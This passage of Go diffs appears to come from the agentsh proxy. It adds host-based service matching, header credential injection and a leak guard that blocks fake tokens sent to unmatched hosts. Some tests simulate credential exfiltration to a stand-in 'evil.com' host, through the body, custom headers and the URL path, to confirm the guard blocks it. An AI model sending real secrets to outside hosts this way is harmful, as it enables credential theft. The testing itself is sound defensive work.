+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{Name: "svc1", Match: ServiceMatchYAML{Hosts: []string{"api.example.com"}}, Secret: ServiceSecretYAML{Ref: "keyring://a/b"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+		{Name: "svc2", Match: ServiceMatchYAML{Hosts: []string{"api.example.com"}}, Secret: ServiceSecretYAML{Ref: "keyring://a/c"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+	}
+	warnings, err := ValidateSecrets(providers, services)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(warnings) == 0 {
+		t.Error("expected overlap warning")
+	}
+}
+
+func TestValidateSecrets_EmptyPolicy_BackwardCompatible(t *testing.T) {
+	warnings, err := ValidateSecrets(nil, nil)
+	if err != nil {
+		t.Fatalf("empty should be valid: %v", err)
+	}
+	if len(warnings) != 0 {
+		t.Errorf("unexpected warnings: %v", warnings)
+	}
+}
+
+func TestValidateSecrets_EmptyHosts(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{Name: "bad", Match: ServiceMatchYAML{Hosts: nil}, Secret: ServiceSecretYAML{Ref: "keyring://a/b"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+	}
+	_, err := ValidateSecrets(providers, services)
+	if err == nil || !strings.Contains(err.Error(), "hosts must not be empty") {
+		t.Errorf("expected empty hosts error, got: %v", err)
+	}
+}
+
+func TestValidateSecrets_NoProviders_ServiceNeedsProvider(t *testing.T) {
+	services := []ServiceYAML{
+		{Name: "github", Match: ServiceMatchYAML{Hosts: []string{"a.com"}}, Secret: ServiceSecretYAML{Ref: "keyring://a/b"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+	}
+	_, err := ValidateSecrets(nil, services)
+	if err == nil || !strings.Contains(err.Error(), "no matching provider") {
+		t.Errorf("expected no matching provider error, got: %v", err)
+	}
+}

--- a/internal/proxy/credshook.go
+++ b/internal/proxy/credshook.go
@@ -5,6 +5,7 @@ import (
 	"io"
 	"log/slog"
 	"net/http"
+	"strings"
 
 	"github.com/agentsh/agentsh/internal/proxy/credsub"
 )
@@ -121,4 +122,49 @@ func (h *LeakGuardHook) logLeak(ctx *RequestContext, serviceName, requestHost st
 		"service_name", serviceName,
 		"request_host", requestHost,
 	)
+}
+
+// HeaderInjectionHook injects the real credential into a request header.
+// Registered per service name so it only fires for matched requests.
+type HeaderInjectionHook struct {
+	serviceName string
+	headerName  string
+	template    string
+	table       *credsub.Table
+}
+
+// NewHeaderInjectionHook creates a hook that injects the real credential
+// for serviceName into the header specified by headerName using template.
+// The template must contain "{{secret}}" which is replaced with the real
+// credential at request time.
+func NewHeaderInjectionHook(serviceName, headerName, template string, table *credsub.Table) *HeaderInjectionHook {
+	return &HeaderInjectionHook{
+		serviceName: serviceName,
+		headerName:  headerName,
+		template:    template,
+		table:       table,
+	}
+}
+
+func (h *HeaderInjectionHook) Name() string { return "header-inject" }
+
+func (h *HeaderInjectionHook) PreHook(r *http.Request, _ *RequestContext) error {
+	real, ok := h.table.RealForService(h.serviceName)
+	if !ok {
+		return nil // service not in table, skip
+	}
+	defer func() {
+		for i := range real {
+			real[i] = 0
+		}
+	}()
+
+	value := strings.Replace(h.template, "{{secret}}", string(real), 1)
+	r.Header.Del(h.headerName)
+	r.Header.Set(h.headerName, value)
+	return nil
+}
+
+func (h *HeaderInjectionHook) PostHook(_ *http.Response, _ *RequestContext) error {
+	return nil
 }

--- a/internal/proxy/credshook.go
+++ b/internal/proxy/credshook.go
@@ -24,19 +24,44 @@ func NewCredsSubHook(table *credsub.Table) *CredsSubHook {
 
 func (h *CredsSubHook) Name() string { return "creds-sub" }
 
-// PreHook replaces fake credentials with real ones in the request body.
+// PreHook replaces fake credentials with real ones in the request
+// body, header values, URL query string, and URL path.
 func (h *CredsSubHook) PreHook(r *http.Request, _ *RequestContext) error {
-	if r.Body == nil {
-		return nil
-	}
-	body, err := io.ReadAll(r.Body)
-	if err != nil {
-		return nil // best-effort
+	// Body substitution.
+	if r.Body != nil {
+		body, err := io.ReadAll(r.Body)
+		if err != nil {
+			return nil // best-effort
+		}
+		replaced := h.table.ReplaceFakeToReal(body)
+		r.Body = io.NopCloser(bytes.NewReader(replaced))
+		r.ContentLength = int64(len(replaced))
 	}
 
-	replaced := h.table.ReplaceFakeToReal(body)
-	r.Body = io.NopCloser(bytes.NewReader(replaced))
-	r.ContentLength = int64(len(replaced))
+	// Header value substitution.
+	for key, vals := range r.Header {
+		for i, v := range vals {
+			replaced := h.table.ReplaceFakeToReal([]byte(v))
+			r.Header[key][i] = string(replaced)
+		}
+	}
+
+	// URL query substitution.
+	if rq := r.URL.RawQuery; rq != "" {
+		replaced := string(h.table.ReplaceFakeToReal([]byte(rq)))
+		r.URL.RawQuery = replaced
+	}
+
+	// URL path substitution.
+	if p := r.URL.Path; p != "" {
+		replaced := string(h.table.ReplaceFakeToReal([]byte(p)))
+		r.URL.Path = replaced
+	}
+	if rp := r.URL.RawPath; rp != "" {
+		replaced := string(h.table.ReplaceFakeToReal([]byte(rp)))
+		r.URL.RawPath = replaced
+	}
+
 	return nil
 }
 

--- a/internal/proxy/credshook.go
+++ b/internal/proxy/credshook.go
@@ -81,14 +81,6 @@ func (h *CredsSubHook) PostHook(resp *http.Response, _ *RequestContext) error {
 	return nil
 }
 
-// scanHeaders lists HTTP headers that LeakGuardHook scans for fakes.
-var scanHeaders = []string{
-	"Authorization",
-	"X-Api-Key",
-	"Api-Key",
-	"X-Auth-Token",
-}
-
 // LeakGuardHook blocks requests that contain known fake credentials.
 type LeakGuardHook struct {
 	table  *credsub.Table
@@ -109,8 +101,10 @@ func (h *LeakGuardHook) PreHook(r *http.Request, ctx *RequestContext) error {
 		if err == nil {
 			r.Body = io.NopCloser(bytes.NewReader(body))
 			if serviceName, found := h.table.ContainsFake(body); found {
-				h.logLeak(ctx, serviceName, r.Host)
-				return &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}
+				if serviceName != ctx.ServiceName {
+					h.logLeak(ctx, serviceName, r.Host)
+					return &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}
+				}
 			}
 		}
 	}
@@ -118,15 +112,29 @@ func (h *LeakGuardHook) PreHook(r *http.Request, ctx *RequestContext) error {
 	// Scan URL query string.
 	if rawQuery := r.URL.RawQuery; rawQuery != "" {
 		if serviceName, found := h.table.ContainsFake([]byte(rawQuery)); found {
-			h.logLeak(ctx, serviceName, r.Host)
-			return &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}
+			if serviceName != ctx.ServiceName {
+				h.logLeak(ctx, serviceName, r.Host)
+				return &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}
+			}
 		}
 	}
 
-	// Scan select headers (all values, not just the first).
-	for _, hdr := range scanHeaders {
-		for _, val := range r.Header.Values(hdr) {
+	// Scan ALL header values.
+	for _, vals := range r.Header {
+		for _, val := range vals {
 			if serviceName, found := h.table.ContainsFake([]byte(val)); found {
+				if serviceName != ctx.ServiceName {
+					h.logLeak(ctx, serviceName, r.Host)
+					return &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}
+				}
+			}
+		}
+	}
+
+	// Scan URL path.
+	if p := r.URL.Path; p != "" {
+		if serviceName, found := h.table.ContainsFake([]byte(p)); found {
+			if serviceName != ctx.ServiceName {
 				h.logLeak(ctx, serviceName, r.Host)
 				return &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}
 			}

--- a/internal/proxy/credshook_test.go
+++ b/internal/proxy/credshook_test.go
@@ -263,3 +263,77 @@ func TestLeakGuardHook_DuplicateHeaders_Returns403(t *testing.T) {
 		t.Errorf("StatusCode = %d, want 403", abortErr.StatusCode)
 	}
 }
+
+func TestHeaderInjectionHook_Name(t *testing.T) {
+	tbl := credsub.New()
+	h := NewHeaderInjectionHook("github", "Authorization", "Bearer {{secret}}", tbl)
+	if h.Name() != "header-inject" {
+		t.Errorf("Name() = %q, want %q", h.Name(), "header-inject")
+	}
+}
+
+func TestHeaderInjectionHook_PreHook_InjectsHeader(t *testing.T) {
+	tbl := newTestTable(t) // has "github" → fake/real pair
+	h := NewHeaderInjectionHook("github", "Authorization", "Bearer {{secret}}", tbl)
+
+	req := httptest.NewRequest(http.MethodPost, "http://api.github.com/repos", nil)
+	req.Header.Set("Authorization", "Bearer ghp_FAKE1234567890abcdef")
+
+	err := h.PreHook(req, &RequestContext{ServiceName: "github"})
+	if err != nil {
+		t.Fatalf("PreHook error: %v", err)
+	}
+
+	got := req.Header.Get("Authorization")
+	want := "Bearer ghp_REAL1234567890abcdef"
+	if got != want {
+		t.Errorf("Authorization = %q, want %q", got, want)
+	}
+}
+
+func TestHeaderInjectionHook_PreHook_StripsExistingHeader(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewHeaderInjectionHook("github", "Authorization", "Bearer {{secret}}", tbl)
+
+	req := httptest.NewRequest(http.MethodPost, "http://api.github.com/repos", nil)
+	req.Header.Set("Authorization", "Bearer something-wrong")
+	req.Header.Add("Authorization", "Bearer also-wrong")
+
+	err := h.PreHook(req, &RequestContext{ServiceName: "github"})
+	if err != nil {
+		t.Fatalf("PreHook error: %v", err)
+	}
+
+	// Should have exactly one Authorization header.
+	vals := req.Header.Values("Authorization")
+	if len(vals) != 1 {
+		t.Errorf("expected 1 Authorization value, got %d", len(vals))
+	}
+}
+
+func TestHeaderInjectionHook_PreHook_ServiceNotInTable(t *testing.T) {
+	tbl := credsub.New()
+	h := NewHeaderInjectionHook("nonexistent", "Authorization", "Bearer {{secret}}", tbl)
+
+	req := httptest.NewRequest(http.MethodPost, "http://example.com", nil)
+
+	err := h.PreHook(req, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PreHook should be no-op when service not in table: %v", err)
+	}
+
+	if req.Header.Get("Authorization") != "" {
+		t.Error("header should not be set when service is not in table")
+	}
+}
+
+func TestHeaderInjectionHook_PostHook_IsNoOp(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewHeaderInjectionHook("github", "Authorization", "Bearer {{secret}}", tbl)
+
+	resp := &http.Response{StatusCode: 200, Body: nil}
+	err := h.PostHook(resp, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PostHook should be no-op: %v", err)
+	}
+}

--- a/internal/proxy/credshook_test.go
+++ b/internal/proxy/credshook_test.go
@@ -394,3 +394,115 @@ func TestCredsSubHook_PreHook_ReplacesInPath(t *testing.T) {
 		t.Errorf("Path = %q, want %q", got, want)
 	}
 }
+
+func TestLeakGuardHook_SkipsMatchedService(t *testing.T) {
+	tbl := newTestTable(t) // has "github" fake
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	body := []byte(`{"token":"ghp_FAKE1234567890abcdef"}`)
+	req := httptest.NewRequest(http.MethodPost, "http://api.github.com/repos", bytes.NewReader(body))
+
+	// ServiceName is set — this is a matched service, should NOT block.
+	err := h.PreHook(req, &RequestContext{
+		RequestID:   "r1",
+		SessionID:   "s1",
+		ServiceName: "github",
+	})
+	if err != nil {
+		t.Fatalf("LeakGuardHook should skip matched services, got: %v", err)
+	}
+}
+
+func TestLeakGuardHook_BlocksUnmatchedWithFake(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	body := []byte(`{"token":"ghp_FAKE1234567890abcdef"}`)
+	req := httptest.NewRequest(http.MethodPost, "http://evil.com/exfil", bytes.NewReader(body))
+
+	// ServiceName is empty — unmatched host, should block.
+	err := h.PreHook(req, &RequestContext{
+		RequestID:   "r1",
+		SessionID:   "s1",
+		ServiceName: "",
+	})
+	if err == nil {
+		t.Fatal("LeakGuardHook should block fakes to unmatched hosts")
+	}
+
+	var abortErr *HookAbortError
+	if !errors.As(err, &abortErr) || abortErr.StatusCode != 403 {
+		t.Errorf("expected HookAbortError 403, got: %v", err)
+	}
+}
+
+func TestLeakGuardHook_FakeInCustomHeader_Returns403(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	req := httptest.NewRequest(http.MethodPost, "http://evil.com/api", nil)
+	req.Header.Set("X-Custom-Token", "ghp_FAKE1234567890abcdef")
+
+	err := h.PreHook(req, &RequestContext{RequestID: "r1", SessionID: "s1"})
+	if err == nil {
+		t.Fatal("expected error — fake is in custom header")
+	}
+
+	var abortErr *HookAbortError
+	if !errors.As(err, &abortErr) || abortErr.StatusCode != 403 {
+		t.Errorf("expected HookAbortError 403, got: %v", err)
+	}
+}
+
+func TestLeakGuardHook_FakeInPath_Returns403(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	req := httptest.NewRequest(http.MethodGet, "http://evil.com/api/ghp_FAKE1234567890abcdef/data", nil)
+
+	err := h.PreHook(req, &RequestContext{RequestID: "r1", SessionID: "s1"})
+	if err == nil {
+		t.Fatal("expected error — fake is in URL path")
+	}
+
+	var abortErr *HookAbortError
+	if !errors.As(err, &abortErr) || abortErr.StatusCode != 403 {
+		t.Errorf("expected HookAbortError 403, got: %v", err)
+	}
+}
+
+func TestLeakGuardHook_BlocksCrossServiceFake(t *testing.T) {
+	tbl := credsub.New()
+	// Two services with different fakes.
+	if err := tbl.Add("github",
+		[]byte("ghp_FAKE1234567890abcdef"),
+		[]byte("ghp_REAL1234567890abcdef"),
+	); err != nil {
+		t.Fatal(err)
+	}
+	if err := tbl.Add("anthropic",
+		[]byte("sk-ant-FAKE567890abcdef12"),
+		[]byte("sk-ant-REAL567890abcdef12"),
+	); err != nil {
+		t.Fatal(err)
+	}
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	// Request matched to "github" but carrying anthropic's fake -> should block.
+	body := []byte(`{"token":"sk-ant-FAKE567890abcdef12"}`)
+	req := httptest.NewRequest(http.MethodPost, "http://api.github.com/repos", bytes.NewReader(body))
+
+	err := h.PreHook(req, &RequestContext{
+		RequestID:   "r1",
+		SessionID:   "s1",
+		ServiceName: "github",
+	})
+	if err == nil {
+		t.Fatal("expected error — anthropic fake in github-matched request should be blocked")
+	}
+
+	var abortErr *HookAbortError
+	if !errors.As(err, &abortErr) || abortErr.StatusCode != 403 {
+		t.Errorf("expected HookAbortError 403, got: %v", err)
+	}
+}

--- a/internal/proxy/credshook_test.go
+++ b/internal/proxy/credshook_test.go
@@ -337,3 +337,60 @@ func TestHeaderInjectionHook_PostHook_IsNoOp(t *testing.T) {
 		t.Fatalf("PostHook should be no-op: %v", err)
 	}
 }
+
+func TestCredsSubHook_PreHook_ReplacesInHeaders(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewCredsSubHook(tbl)
+
+	req := httptest.NewRequest(http.MethodPost, "http://api.example.com/v1/test", nil)
+	req.Header.Set("Authorization", "Bearer ghp_FAKE1234567890abcdef")
+
+	err := h.PreHook(req, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PreHook error: %v", err)
+	}
+
+	got := req.Header.Get("Authorization")
+	want := "Bearer ghp_REAL1234567890abcdef"
+	if got != want {
+		t.Errorf("Authorization = %q, want %q", got, want)
+	}
+}
+
+func TestCredsSubHook_PreHook_ReplacesInQuery(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewCredsSubHook(tbl)
+
+	req := httptest.NewRequest(http.MethodGet,
+		"http://api.example.com/v1/test?key=ghp_FAKE1234567890abcdef", nil)
+
+	err := h.PreHook(req, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PreHook error: %v", err)
+	}
+
+	got := req.URL.RawQuery
+	want := "key=ghp_REAL1234567890abcdef"
+	if got != want {
+		t.Errorf("RawQuery = %q, want %q", got, want)
+	}
+}
+
+func TestCredsSubHook_PreHook_ReplacesInPath(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewCredsSubHook(tbl)
+
+	req := httptest.NewRequest(http.MethodGet,
+		"http://api.example.com/v1/ghp_FAKE1234567890abcdef/info", nil)
+
+	err := h.PreHook(req, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PreHook error: %v", err)
+	}
+
+	got := req.URL.Path
+	want := "/v1/ghp_REAL1234567890abcdef/info"
+	if got != want {
+		t.Errorf("Path = %q, want %q", got, want)
+	}
+}

--- a/internal/proxy/credsub/table.go
+++ b/internal/proxy/credsub/table.go
@@ -121,6 +121,27 @@ func (t *Table) FakeForService(serviceName string) ([]byte, bool) {
 	return nil, false
 }
 
+// RealForService returns the real byte sequence registered for a
+// service. The returned slice is a deep copy; the caller may retain
+// or mutate it. Callers should zero the returned slice when done to
+// avoid leaving credential material in memory.
+//
+// This method is intended for internal proxy use only (e.g. header
+// injection). Returns (nil, false) if no entry is registered.
+func (t *Table) RealForService(serviceName string) ([]byte, bool) {
+	t.mu.RLock()
+	defer t.mu.RUnlock()
+
+	for _, e := range t.entries {
+		if e.ServiceName == serviceName {
+			out := make([]byte, len(e.Real))
+			copy(out, e.Real)
+			return out, true
+		}
+	}
+	return nil, false
+}
+
 // Contains reports whether a byte sequence is a registered fake in
 // the table. It performs an EXACT match (not a substring search). If
 // found, it returns a deep-copied Entry (Fake and Real are fresh

--- a/internal/proxy/credsub/table_test.go
+++ b/internal/proxy/credsub/table_test.go
@@ -691,6 +691,53 @@ func TestContainsFake_MultipleEntries_FindsFirst(t *testing.T) {
 	}
 }
 
+func TestTable_RealForService(t *testing.T) {
+	tbl := New()
+	fake := []byte("FAKE_CREDENTIAL_24CHARS!")
+	real := []byte("REAL_CREDENTIAL_24CHARS!")
+	if err := tbl.Add("github", fake, real); err != nil {
+		t.Fatal(err)
+	}
+
+	got, ok := tbl.RealForService("github")
+	if !ok {
+		t.Fatal("RealForService(github) returned false")
+	}
+	if !bytes.Equal(got, real) {
+		t.Errorf("got %q, want %q", got, real)
+	}
+
+	// Returned slice must be a copy — mutating it must not affect table.
+	got[0] = 'X'
+	got2, _ := tbl.RealForService("github")
+	if got2[0] == 'X' {
+		t.Error("RealForService returned aliased slice, not a copy")
+	}
+}
+
+func TestTable_RealForService_UnknownService(t *testing.T) {
+	tbl := New()
+	_, ok := tbl.RealForService("nonexistent")
+	if ok {
+		t.Error("RealForService should return false for unknown service")
+	}
+}
+
+func TestTable_RealForService_AfterZero(t *testing.T) {
+	tbl := New()
+	if err := tbl.Add("github",
+		[]byte("FAKE_CREDENTIAL_24CHARS!"),
+		[]byte("REAL_CREDENTIAL_24CHARS!"),
+	); err != nil {
+		t.Fatal(err)
+	}
+	tbl.Zero()
+	_, ok := tbl.RealForService("github")
+	if ok {
+		t.Error("RealForService should return false after Zero()")
+	}
+}
+
 func TestConcurrentAccess_NoRaces(t *testing.T) {
 	// This test is primarily for `go test -race` to detect data
 	// races. It exercises Add, FakeForService, Contains,

--- a/internal/proxy/proxy.go
+++ b/internal/proxy/proxy.go
@@ -20,6 +20,7 @@ import (
 	"github.com/agentsh/agentsh/internal/config"
 	"github.com/agentsh/agentsh/internal/mcpinspect"
 	"github.com/agentsh/agentsh/internal/mcpregistry"
+	"github.com/agentsh/agentsh/internal/proxy/services"
 )
 
 // tpmFallbackTokenCharge is the conservative token charge applied when TPM
@@ -71,6 +72,8 @@ type Proxy struct {
 	// hookRegistry dispatches pre/post hooks for credential
 	// substitution, leak detection, and other per-request extensions.
 	hookRegistry *Registry
+	// matcher resolves Host headers to service names.
+	matcher *services.Matcher
 
 	server   *http.Server
 	listener net.Listener
@@ -179,6 +182,20 @@ func (p *Proxy) SetRegistry(r *mcpregistry.Registry) {
 // register Hook implementations that participate in the request pipeline.
 func (p *Proxy) HookRegistry() *Registry {
 	return p.hookRegistry
+}
+
+// SetMatcher sets the service matcher on the proxy. It is safe for
+// concurrent use and is called after credential bootstrap completes.
+func (p *Proxy) SetMatcher(m *services.Matcher) {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	p.matcher = m
+}
+
+func (p *Proxy) getMatcher() *services.Matcher {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	return p.matcher
 }
 
 // SetEventCallback sets a callback that is invoked for each MCP tool call
@@ -362,13 +379,21 @@ func (p *Proxy) ServeHTTP(w http.ResponseWriter, r *http.Request) {
 
 	// Apply pre-hooks (leak guard, credential substitution).
 	if p.hookRegistry != nil {
-		reqCtx = &RequestContext{
-			RequestID: requestID,
-			SessionID: sessionID,
-			StartTime: startTime,
-			Attrs:     make(map[string]any),
+		// Resolve service name from host.
+		serviceName := ""
+		if m := p.getMatcher(); m != nil {
+			if name, ok := m.Match(r.Host); ok {
+				serviceName = name
+			}
 		}
-		if err := p.hookRegistry.ApplyPreHooks("", r, reqCtx); err != nil {
+		reqCtx = &RequestContext{
+			RequestID:   requestID,
+			SessionID:   sessionID,
+			ServiceName: serviceName,
+			StartTime:   startTime,
+			Attrs:       make(map[string]any),
+		}
+		if err := p.hookRegistry.ApplyPreHooks(serviceName, r, reqCtx); err != nil {
 			var abortErr *HookAbortError
 			if errors.As(err, &abortErr) {
 				code := abortErr.StatusCode
@@ -458,7 +483,7 @@ func (p *Proxy) ServeHTTP(w http.ResponseWriter, r *http.Request) {
 				// Put body back so hooks can read/modify it.
 				resp.Body = io.NopCloser(bytes.NewReader(respBody))
 				resp.ContentLength = int64(len(respBody))
-				if hookErr := p.hookRegistry.ApplyPostHooks("", resp, reqCtx); hookErr != nil {
+				if hookErr := p.hookRegistry.ApplyPostHooks(reqCtx.ServiceName, resp, reqCtx); hookErr != nil {
 					p.logger.Warn("post-hook error", "error", hookErr, "request_id", requestID)
 				}
 				// Re-read body in case a hook replaced it.

--- a/internal/proxy/proxy_hooks_test.go
+++ b/internal/proxy/proxy_hooks_test.go
@@ -7,6 +7,8 @@ import (
 	"net/http"
 	"net/http/httptest"
 	"testing"
+
+	"github.com/agentsh/agentsh/internal/proxy/services"
 )
 
 func TestProxy_HookRegistry_Accessor(t *testing.T) {
@@ -112,5 +114,61 @@ func TestProxy_PreHookAbortError_NonErrorStatus_Falls502(t *testing.T) {
 				t.Errorf("status = %d, want 502 for non-error status code %d", w.Code, tt.code)
 			}
 		})
+	}
+}
+
+// serviceRecorderHook is a test double whose PreHook invokes a callback
+// with the request and context, allowing tests to inspect ServiceName
+// and other fields.
+type serviceRecorderHook struct {
+	name  string
+	preFn func(*http.Request, *RequestContext) error
+}
+
+func (h *serviceRecorderHook) Name() string { return h.name }
+
+func (h *serviceRecorderHook) PreHook(r *http.Request, ctx *RequestContext) error {
+	if h.preFn != nil {
+		return h.preFn(r, ctx)
+	}
+	return nil
+}
+
+func (h *serviceRecorderHook) PostHook(_ *http.Response, _ *RequestContext) error { return nil }
+
+func TestProxy_MatcherDispatchesServiceHooks(t *testing.T) {
+	cfg := Config{SessionID: "test-session"}
+	p, err := New(cfg, "", nil)
+	if err != nil {
+		t.Fatalf("New() error: %v", err)
+	}
+
+	p.SetMatcher(services.NewMatcher([]services.ServicePattern{
+		{Name: "github", Hosts: []string{"api.github.com"}},
+	}))
+
+	// Register a hook under "github" that records it was called.
+	called := false
+	p.HookRegistry().Register("github", &serviceRecorderHook{
+		name: "recorder",
+		preFn: func(r *http.Request, ctx *RequestContext) error {
+			called = true
+			if ctx.ServiceName != "github" {
+				t.Errorf("ServiceName = %q, want github", ctx.ServiceName)
+			}
+			return nil
+		},
+	})
+
+	req := httptest.NewRequest(http.MethodPost, "http://api.github.com/v1/messages",
+		bytes.NewReader([]byte(`{}`)))
+	req.Header.Set("x-api-key", "sk-ant-test")
+	req.Header.Set("anthropic-version", "2023-06-01")
+	w := httptest.NewRecorder()
+
+	p.ServeHTTP(w, req)
+
+	if !called {
+		t.Error("service-scoped hook was not called for matched host")
 	}
 }

--- a/internal/proxy/services/matcher.go
+++ b/internal/proxy/services/matcher.go
@@ -1,0 +1,81 @@
+package services
+
+import "strings"
+
+// ServicePattern describes a service's host matching rules.
+type ServicePattern struct {
+	Name  string
+	Hosts []string // literal hostnames or "*.suffix" wildcards
+}
+
+// hostPattern is a pre-compiled host pattern.
+type hostPattern struct {
+	serviceName string
+	isWildcard  bool
+	literal     string // lowercase, used when isWildcard == false
+	suffix      string // lowercase, ".example.com", used when isWildcard == true
+}
+
+// Matcher resolves HTTP Host headers to service names.
+// Safe for concurrent use — all state is read-only after construction.
+type Matcher struct {
+	patterns []hostPattern
+}
+
+// NewMatcher pre-compiles service host patterns. Order matters:
+// first match wins.
+func NewMatcher(services []ServicePattern) *Matcher {
+	var patterns []hostPattern
+	for _, svc := range services {
+		for _, h := range svc.Hosts {
+			p := hostPattern{serviceName: svc.Name}
+			if strings.HasPrefix(h, "*.") {
+				p.isWildcard = true
+				// Normalise suffix: lowercase and strip any trailing dot.
+				p.suffix = strings.TrimSuffix(strings.ToLower(h[1:]), ".")
+			} else {
+				// Normalise literal: lowercase and strip any trailing dot.
+				p.literal = strings.TrimSuffix(strings.ToLower(h), ".")
+			}
+			patterns = append(patterns, p)
+		}
+	}
+	return &Matcher{patterns: patterns}
+}
+
+// Match returns the service name for the given host, or ("", false)
+// if no pattern matches. Port is stripped before matching.
+func (m *Matcher) Match(host string) (string, bool) {
+	// Strip port if present, with bracket-aware IPv6 handling.
+	if strings.HasPrefix(host, "[") {
+		// Bracketed IPv6: look for "]:" to find port separator.
+		if i := strings.Index(host, "]:"); i != -1 {
+			host = host[:i+1] // keep the closing bracket, drop ":port"
+		}
+		// No "]:" found — no port to strip; leave host unchanged.
+	} else {
+		if i := strings.LastIndex(host, ":"); i != -1 {
+			host = host[:i]
+		}
+	}
+	// Lowercase then strip any trailing FQDN dot.
+	host = strings.TrimSuffix(strings.ToLower(host), ".")
+
+	for _, p := range m.patterns {
+		if p.isWildcard {
+			// *.example.com matches api.example.com but not
+			// example.com and not sub.api.example.com.
+			if strings.HasSuffix(host, p.suffix) {
+				prefix := host[:len(host)-len(p.suffix)]
+				if len(prefix) > 0 && !strings.Contains(prefix, ".") {
+					return p.serviceName, true
+				}
+			}
+		} else {
+			if host == p.literal {
+				return p.serviceName, true
+			}
+		}
+	}
+	return "", false
+}

--- a/internal/proxy/services/matcher_test.go
+++ b/internal/proxy/services/matcher_test.go
@@ -1,0 +1,130 @@
+package services
+
+import "testing"
+
+func TestMatcher_LiteralMatch(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "github", Hosts: []string{"api.github.com"}},
+	})
+	name, ok := m.Match("api.github.com")
+	if !ok || name != "github" {
+		t.Errorf("Match(api.github.com) = (%q, %v), want (github, true)", name, ok)
+	}
+}
+
+func TestMatcher_LiteralMatch_CaseInsensitive(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "github", Hosts: []string{"api.github.com"}},
+	})
+	name, ok := m.Match("API.GitHub.COM")
+	if !ok || name != "github" {
+		t.Errorf("Match(API.GitHub.COM) = (%q, %v), want (github, true)", name, ok)
+	}
+}
+
+func TestMatcher_WildcardMatch(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "github", Hosts: []string{"*.github.com"}},
+	})
+
+	tests := []struct {
+		host string
+		want bool
+	}{
+		{"api.github.com", true},
+		{"uploads.github.com", true},
+		{"github.com", false},          // bare domain doesn't match wildcard
+		{"sub.api.github.com", false},  // multi-level doesn't match
+	}
+
+	for _, tt := range tests {
+		name, ok := m.Match(tt.host)
+		if ok != tt.want {
+			t.Errorf("Match(%q) ok=%v, want %v (name=%q)", tt.host, ok, tt.want, name)
+		}
+		if ok && name != "github" {
+			t.Errorf("Match(%q) name=%q, want github", tt.host, name)
+		}
+	}
+}
+
+func TestMatcher_PortStripping(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "github", Hosts: []string{"api.github.com"}},
+	})
+	name, ok := m.Match("api.github.com:443")
+	if !ok || name != "github" {
+		t.Errorf("Match(api.github.com:443) = (%q, %v), want (github, true)", name, ok)
+	}
+}
+
+func TestMatcher_FirstMatchWins(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "specific", Hosts: []string{"api.example.com"}},
+		{Name: "wildcard", Hosts: []string{"*.example.com"}},
+	})
+	name, ok := m.Match("api.example.com")
+	if !ok || name != "specific" {
+		t.Errorf("Match(api.example.com) = (%q, %v), want (specific, true)", name, ok)
+	}
+}
+
+func TestMatcher_NoMatch(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "github", Hosts: []string{"api.github.com"}},
+	})
+	name, ok := m.Match("evil.com")
+	if ok {
+		t.Errorf("Match(evil.com) = (%q, true), want (\"\", false)", name)
+	}
+}
+
+func TestMatcher_Empty(t *testing.T) {
+	m := NewMatcher(nil)
+	_, ok := m.Match("anything.com")
+	if ok {
+		t.Error("empty matcher should never match")
+	}
+}
+
+func TestMatcher_TrailingDot(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "github", Hosts: []string{"api.github.com"}},
+	})
+	name, ok := m.Match("api.github.com.")
+	if !ok || name != "github" {
+		t.Errorf("Match(api.github.com.) = (%q, %v), want (github, true)", name, ok)
+	}
+}
+
+func TestMatcher_IPv6_NoPort(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "local", Hosts: []string{"[::1]"}},
+	})
+	name, ok := m.Match("[::1]")
+	if !ok || name != "local" {
+		t.Errorf("Match([::1]) = (%q, %v), want (local, true)", name, ok)
+	}
+}
+
+func TestMatcher_IPv6_WithPort(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "local", Hosts: []string{"[::1]"}},
+	})
+	name, ok := m.Match("[::1]:8080")
+	if !ok || name != "local" {
+		t.Errorf("Match([::1]:8080) = (%q, %v), want (local, true)", name, ok)
+	}
+}
+
+func TestMatcher_MultipleHosts(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
